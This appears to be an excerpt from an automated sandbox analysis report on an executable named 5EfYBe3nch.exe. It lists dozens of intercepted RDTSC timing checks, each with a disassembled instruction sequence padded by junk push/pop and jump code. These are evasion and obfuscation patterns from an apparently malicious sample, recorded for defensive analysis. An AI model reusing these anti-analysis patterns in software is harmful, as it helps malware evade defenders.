                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B8C373 second address: B8C379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C530CF second address: C530EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FD668F2A646h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C530EE second address: C5310A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5310A second address: C5311E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD668F2A636h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5311E second address: C53122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C52F89 second address: C52F9C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD668F2A63Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C550E1 second address: C550F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FD668F2A766h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C550F0 second address: C550F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C54CFF second address: C54D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C54D03 second address: C54D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5AAA4 second address: C5AAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A779h 0x00000009 jns 00007FD668F2A766h 0x0000000f popad 0x00000010 jmp 00007FD668F2A76Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5AAD7 second address: C5AADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5AADB second address: C5AAF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FD668F2A76Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5A54D second address: C5A551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C63436 second address: C63446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C667D0 second address: C667EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD668F2A644h 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C6A13B second address: C6A13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C6A13F second address: C6A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD668F2A63Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C6A14F second address: C6A158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C6A158 second address: C6A16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FD668F2A638h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C713C7 second address: C713DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD668F2A766h 0x00000008 jng 00007FD668F2A766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C7152D second address: C7153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD668F2A636h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C7153B second address: C71543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71543 second address: C71552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FD668F2A636h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71552 second address: C71556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71927 second address: C71932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71932 second address: C71936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71936 second address: C7193F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C725B7 second address: C725BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C725BD second address: C725C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C725C4 second address: C725D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FD668F2A766h 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C725D0 second address: C725E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FD668F2A636h 0x0000000e jns 00007FD668F2A636h 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C7709B second address: C770A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FD668F2A766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C770A9 second address: C770AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C76C6D second address: C76CBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FD668F2A778h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD668F2A778h 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C76CBD second address: C76CC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007FD668F2A636h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C76CC8 second address: C76CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C840B9 second address: C840BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C95206 second address: C95221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD668F2A766h 0x0000000a jp 00007FD668F2A766h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 jbe 00007FD668F2A76Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D2E second address: C94D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D32 second address: C94D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D36 second address: C94D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FD668F2A645h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D55 second address: C94D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D6F second address: C94D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD668F2A636h 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FD668F2A638h 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94EE2 second address: C94F02 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD668F2A772h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FD668F2A799h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAAEC9 second address: CAAECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CA9FA8 second address: CA9FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD668F2A766h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push edx 0x00000010 jnp 00007FD668F2A766h 0x00000016 jbe 00007FD668F2A766h 0x0000001c pop edx 0x0000001d push esi 0x0000001e jne 00007FD668F2A766h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA135 second address: CAA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD668F2A643h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA3C5 second address: CAA3CF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD668F2A766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA7F7 second address: CAA7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA943 second address: CAA947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA947 second address: CAA962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD668F2A63Ah 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAAAAB second address: CAAAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAAAB0 second address: CAAB0F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD668F2A638h 0x00000008 pushad 0x00000009 jnp 00007FD668F2A636h 0x0000000f jo 00007FD668F2A636h 0x00000015 jmp 00007FD668F2A644h 0x0000001a jmp 00007FD668F2A63Bh 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007FD668F2A63Bh 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f pushad 0x00000030 popad 0x00000031 pop edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FD668F2A63Eh 0x00000039 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CADA20 second address: CADA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CADD4E second address: CADD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD668F2A642h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CADD6A second address: CADD6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CADD6F second address: CADD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor dl, FFFFFF86h 0x0000000d push dword ptr [ebp+122D21DBh] 0x00000013 mov edx, dword ptr [ebp+1244CA28h] 0x00000019 mov dx, 766Ah 0x0000001d push 8E3877EFh 0x00000022 pushad 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCAFFF second address: BCB003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C0440 second address: 52C044F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C044F second address: 52C04DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD668F2A76Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD668F2A771h 0x00000017 add ax, D0D6h 0x0000001c jmp 00007FD668F2A771h 0x00000021 popfd 0x00000022 pushad 0x00000023 mov eax, 08C95E99h 0x00000028 popad 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b jmp 00007FD668F2A774h 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FD668F2A777h 0x00000039 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C04DE second address: 52C04E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C04E5 second address: 52C0500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+0Ch] 0x0000000a pushad 0x0000000b jmp 00007FD668F2A76Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 mov cx, 80F7h 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C0500 second address: 52C0540 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD668F2A648h 0x00000016 or ch, 00000048h 0x00000019 jmp 00007FD668F2A63Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C059B second address: 52C05A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F05C8 second address: 52F0673 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD668F2A642h 0x00000008 or ecx, 572DFBD8h 0x0000000e jmp 00007FD668F2A63Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov dl, cl 0x0000001b movsx edi, cx 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FD668F2A643h 0x00000025 xchg eax, ebp 0x00000026 jmp 00007FD668F2A646h 0x0000002b mov ebp, esp 0x0000002d jmp 00007FD668F2A640h 0x00000032 xchg eax, ecx 0x00000033 jmp 00007FD668F2A640h 0x00000038 push eax 0x00000039 jmp 00007FD668F2A63Bh 0x0000003e xchg eax, ecx 0x0000003f jmp 00007FD668F2A646h 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov ax, 45B3h 0x0000004c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0673 second address: 52F06AF instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, si 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FD668F2A771h 0x00000010 xchg eax, esi 0x00000011 jmp 00007FD668F2A76Eh 0x00000016 lea eax, dword ptr [ebp-04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD668F2A76Ah 0x00000022 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F06AF second address: 52F06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F06B3 second address: 52F06B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F06B9 second address: 52F0723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 071D5D73h 0x00000008 pushfd 0x00000009 jmp 00007FD668F2A648h 0x0000000e xor ax, 7478h 0x00000013 jmp 00007FD668F2A63Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD668F2A63Bh 0x00000026 adc ax, 443Eh 0x0000002b jmp 00007FD668F2A649h 0x00000030 popfd 0x00000031 mov esi, 71D08387h 0x00000036 popad 0x00000037 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0723 second address: 52F0774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edx, 41BEEC02h 0x00000010 pushfd 0x00000011 jmp 00007FD668F2A773h 0x00000016 add ah, FFFFFFFEh 0x00000019 jmp 00007FD668F2A779h 0x0000001e popfd 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0774 second address: 52F0778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0778 second address: 52F077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F077E second address: 52F0793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A641h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F07E9 second address: 52F07EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F07EE second address: 52F083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD668F2A63Eh 0x00000013 and ecx, 09017C48h 0x00000019 jmp 00007FD668F2A63Bh 0x0000001e popfd 0x0000001f jmp 00007FD668F2A648h 0x00000024 popad 0x00000025 mov esi, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F083D second address: 52F0841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0841 second address: 52F0845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0845 second address: 52F084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F084B second address: 52F0851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F08D5 second address: 52E0035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FD668F2A76Eh 0x0000000f leave 0x00000010 jmp 00007FD668F2A770h 0x00000015 retn 0004h 0x00000018 nop 0x00000019 sub esp, 04h 0x0000001c cmp eax, 00000000h 0x0000001f setne al 0x00000022 xor ebx, ebx 0x00000024 test al, 01h 0x00000026 jne 00007FD668F2A767h 0x00000028 mov dword ptr [esp], 0000000Dh 0x0000002f call 00007FD66D8179BFh 0x00000034 mov edi, edi 0x00000036 jmp 00007FD668F2A76Eh 0x0000003b xchg eax, ebp 0x0000003c jmp 00007FD668F2A770h 0x00000041 push eax 0x00000042 jmp 00007FD668F2A76Bh 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov eax, edi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
